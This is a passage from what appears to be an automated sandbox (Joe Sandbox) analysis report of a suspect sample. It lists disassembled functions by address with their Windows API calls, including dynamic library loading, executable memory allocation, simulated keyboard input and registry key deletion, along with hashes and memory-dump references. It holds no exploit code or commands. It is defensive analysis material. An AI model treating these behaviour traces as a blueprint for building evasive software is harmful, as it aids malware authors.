                                        • Opcode ID: 07dedbbe12310ed5ead9d9ff8053a328b9ec53cee6f0689693ca1710db513b06
                                        • Instruction ID: 749fe1ae03ed2f24c822919fd7c49a6b6cb568a74dc727459e65a1031d394ee9
                                        • Opcode Fuzzy Hash: 07dedbbe12310ed5ead9d9ff8053a328b9ec53cee6f0689693ca1710db513b06
                                        • Instruction Fuzzy Hash: E5D0A738544322AFD7306F70F80862237D6FB24311B029419E465D1260E77CC8C0D714
                                        Function 007CEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007CEBAF,?,007CEAAC), ref: 007CEBC7
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007CEBD9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                        • API String ID: 2574300362-1816364905
                                        • Opcode ID: 110c1d8818766f34c05c6e91ab495b60dbb31e5bd8c91193dfbcf31755649955
                                        • Instruction ID: 650ab4038455cbb136e5b51b0e85f1bc23da50287e35c4e0e42e597d99bd8356
                                        • Opcode Fuzzy Hash: 110c1d8818766f34c05c6e91ab495b60dbb31e5bd8c91193dfbcf31755649955
                                        • Instruction Fuzzy Hash: 05D05E744047229BD7301F70A848F2137D6FB04304B12C41DE466D2250DA78DC80C614
                                        Function 007B137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,007B135F,?,007B1440), ref: 007B1389
                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 007B139B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                        • API String ID: 2574300362-1071820185
                                        • Opcode ID: 94374e7790b1926c77fb6d970738711ca1b171d9664c510dcfd157c6426bf022
                                        • Instruction ID: 3df6e61ca42c4f9c4d75b87032c2ee4239cb58fda0b57eef5447409b6888ffa8
                                        • Opcode Fuzzy Hash: 94374e7790b1926c77fb6d970738711ca1b171d9664c510dcfd157c6426bf022
                                        • Instruction Fuzzy Hash: BED0A7308107229FD7300F24F81879537D6FF04304F458419E495E2650E67CC8C0D724
                                        Function 007B13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,007B1371,?,007B1519), ref: 007B13B4
                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007B13C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                        • API String ID: 2574300362-1587604923
                                        • Opcode ID: bf1d82e2d98dbe9be8c60b01d325c8e22ce753bde274d5c7c2f37128b2f319e4
                                        • Instruction ID: 9fb54c5543476e19813a1bde9bf4cede53a9079d4a592dec52bc33ea23ce82d9
                                        • Opcode Fuzzy Hash: bf1d82e2d98dbe9be8c60b01d325c8e22ce753bde274d5c7c2f37128b2f319e4
                                        • Instruction Fuzzy Hash: E5D0A930800722AFD7300F24F81879237EBFB40304F41842AE4A5E26A0EABCC8C0CB24
                                        Function 007D3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,007D3AC2,?,007D3CF7), ref: 007D3ADA
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007D3AEC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2574300362-4033151799
                                        • Opcode ID: 19201806ec73895acb51574eab47f43814360bb9edbf231b6fe8caeffaf89e1c
                                        • Instruction ID: dda061e14440a36f415b2bf9cae74d4058e0f1d4239ba12b1bdd2c029227e5ad
                                        • Opcode Fuzzy Hash: 19201806ec73895acb51574eab47f43814360bb9edbf231b6fe8caeffaf89e1c
                                        • Instruction Fuzzy Hash: 46D05E305043278ED7204B20A80965137E6FB11304B01942AF4A5D1750EAB8C880C625
                                        Function 0077AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,007C6AA6), ref: 0077AB2D
                                        • _wcscmp.LIBCMT ref: 0077AB49
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcscmp
                                        • String ID:
                                        • API String ID: 820872866-0
                                        • Opcode ID: 67903725d85d5787d4d05a1111f424400b4dafcfdcc0729c884599a9e408d031
                                        • Instruction ID: 3b6c9472d304b69fc212f1d1956219db35ef0fbda765a6ae847b0cd0b7ee4c3f
                                        • Opcode Fuzzy Hash: 67903725d85d5787d4d05a1111f424400b4dafcfdcc0729c884599a9e408d031
                                        • Instruction Fuzzy Hash: 23A1F47070010AEBEF15DF65E94567DB7B1FF88380F64C169E80A832A0E7389871C782
                                        Function 007D0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 007D0D85
                                        • CharLowerBuffW.USER32(?,?), ref: 007D0DC8
                                          • Part of subcall function 007D0458: CharLowerBuffW.USER32(?,?,?,?), ref: 007D0478
                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007D0FB2
                                        • _memmove.LIBCMT ref: 007D0FC2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                        • String ID:
                                        • API String ID: 3659485706-0
                                        • Opcode ID: df2897d1925454d360292b317a5170108585e7ce740e8d9c24f82b34f4a68e22
                                        • Instruction ID: 735ea99cff528986b806d2001b970c3c2d669fd25a9aca6e6423183ea9a97266
                                        • Opcode Fuzzy Hash: df2897d1925454d360292b317a5170108585e7ce740e8d9c24f82b34f4a68e22
                                        • Instruction Fuzzy Hash: 9AB17B71604300DFC714EF28C484A6AB7F5EF89354F14886EF8899B352DB39E946CB92
                                        Function 007CAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 007CAF56
                                        • CoUninitialize.COMBASE ref: 007CAF61
                                          • Part of subcall function 007B1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007B10B8
                                        • VariantInit.OLEAUT32(?), ref: 007CAF6C
                                        • VariantClear.OLEAUT32(?), ref: 007CB23F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                        • String ID:
                                        • API String ID: 780911581-0
                                        • Opcode ID: 9bb87a0d3d64553a099a7547fa50494b595da7f8130ad71d3224320a6c6d8bf6
                                        • Instruction ID: 55630a0eb1fe1197a994a3d0c405041c5ed0eadd62afafe98f53ad63f518c962
                                        • Opcode Fuzzy Hash: 9bb87a0d3d64553a099a7547fa50494b595da7f8130ad71d3224320a6c6d8bf6
                                        • Instruction Fuzzy Hash: 24A10675644601AFCB10EF14C89AF1AB7E4BF88360F14845DF9999B3A1DB78ED44CB82
                                        Function 007942EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                        • String ID:
                                        • API String ID: 3877424927-0
                                        • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                        • Instruction ID: 8ec133ae2cb393ca9e2bcecd1841f5850e9d09114736100c64371edd7fb26e28
                                        • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                        • Instruction Fuzzy Hash: 2751D530A00345DBDF248FB9E884EAE77B5AF41334F248729F875A62E1D7789D529B40
                                        Function 007DC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 007DC354
                                        • ScreenToClient.USER32(?,00000002), ref: 007DC384
                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 007DC3EA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 64d3415dea791b551f3e746ae46608a0d0103c7c68f0c60ed037a989b99ca289
                                        • Instruction ID: df79d63657d2e46f1ae16dc599835dfaccbdb5043c01f3296085fe723ad08cf2
                                        • Opcode Fuzzy Hash: 64d3415dea791b551f3e746ae46608a0d0103c7c68f0c60ed037a989b99ca289
                                        • Instruction Fuzzy Hash: 37517C31A00246EFCF21DF68C884AAE7BB6FB45360F24856AF915DB290D774ED41CB91
                                        Function 007AD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007AD258
                                        • __itow.LIBCMT ref: 007AD292
                                          • Part of subcall function 007AD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007AD549
                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 007AD2FB
                                        • __itow.LIBCMT ref: 007AD350
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow
                                        • String ID:
                                        • API String ID: 3379773720-0
                                        • Opcode ID: fe4d803d0b1415065dfa55a5ee40e1534050dd42eae5708c192bd2cbf929b9af
                                        • Instruction ID: 6b4ed504c221eaed1594cdee6632b0fbe7118dc5ea9077c3a999a0d30522cd95
                                        • Opcode Fuzzy Hash: fe4d803d0b1415065dfa55a5ee40e1534050dd42eae5708c192bd2cbf929b9af
                                        • Instruction Fuzzy Hash: 1B41D871A00309EBDF21EF54C856FEE7BB9AF89740F004119FA06A3291DB789E45CB52
                                        Function 007BEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007BEF32
                                        • GetLastError.KERNEL32(?,00000000), ref: 007BEF58
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007BEF7D
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007BEFA9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: ba48c80af94b6827cc9c7851104225e73c0fe4b9c85aabe3a7471551e87589bc
                                        • Instruction ID: 34ade5f8c1b4bb7374698f62d970af70ce6de3ec9bf8c95b4ad4a605fc07a8f3
                                        • Opcode Fuzzy Hash: ba48c80af94b6827cc9c7851104225e73c0fe4b9c85aabe3a7471551e87589bc
                                        • Instruction Fuzzy Hash: 12414D35600611DFCF11EF15C548A99BBE5EF89360B19C498E849AF362CB78FD40DB92
                                        Function 007DB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                        Download Yara Rule
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007DB3E1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        • Opcode ID: e83a4259fa5ecbf3ac4ec9002a6d6bd42f4d1df97da6b49515bf5af90efe3b41
                                        • Instruction ID: a43d966ecdf31d4626d5b4a21c6f9ba5b33e63f91fa8e7b655fbb6a1c8f1ad38
                                        • Opcode Fuzzy Hash: e83a4259fa5ecbf3ac4ec9002a6d6bd42f4d1df97da6b49515bf5af90efe3b41
                                        • Instruction Fuzzy Hash: D6318D34600244EBEF24DE58CC99BAC3775EB0A350F668513FA51D63A2C738E940AB61
                                        Function 007DD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 007DD617
                                        • GetWindowRect.USER32(?,?), ref: 007DD68D
                                        • PtInRect.USER32(?,?,007DEB2C), ref: 007DD69D
                                        • MessageBeep.USER32(00000000), ref: 007DD70E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: b3b3411f25edb52a3d9976125c7c6024eaae81628904e58b9ab110fb99061fb6
                                        • Instruction ID: ffc933bc21a3acab3cc1cee8654258edbea32e6cd85b625aab125bd7e4bba2fe
                                        • Opcode Fuzzy Hash: b3b3411f25edb52a3d9976125c7c6024eaae81628904e58b9ab110fb99061fb6
                                        • Instruction Fuzzy Hash: C4416930A00118DFCF21DF98D884BA97BF5BB89790F1881AAE519DB391D738EC41DB90
                                        Function 007B4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 007B44EE
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 007B450A
                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 007B456A
                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 007B45C8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: c654244d08556fa9df441794450a35cf12c9491bc750d5a823fcebd64e5ed30f
                                        • Instruction ID: 7e049ed9c1766a7b1804c4d88ad28052eb000f969d454cb1e2ebdc212d42c739
                                        • Opcode Fuzzy Hash: c654244d08556fa9df441794450a35cf12c9491bc750d5a823fcebd64e5ed30f
                                        • Instruction Fuzzy Hash: 7231F8B1904658AFEF308B6498197FE7BB5AF45314F04015AF482932C3C77C9EA5D762
                                        Function 007A4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A4DE8
                                        • __isleadbyte_l.LIBCMT ref: 007A4E16
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007A4E44
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007A4E7A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
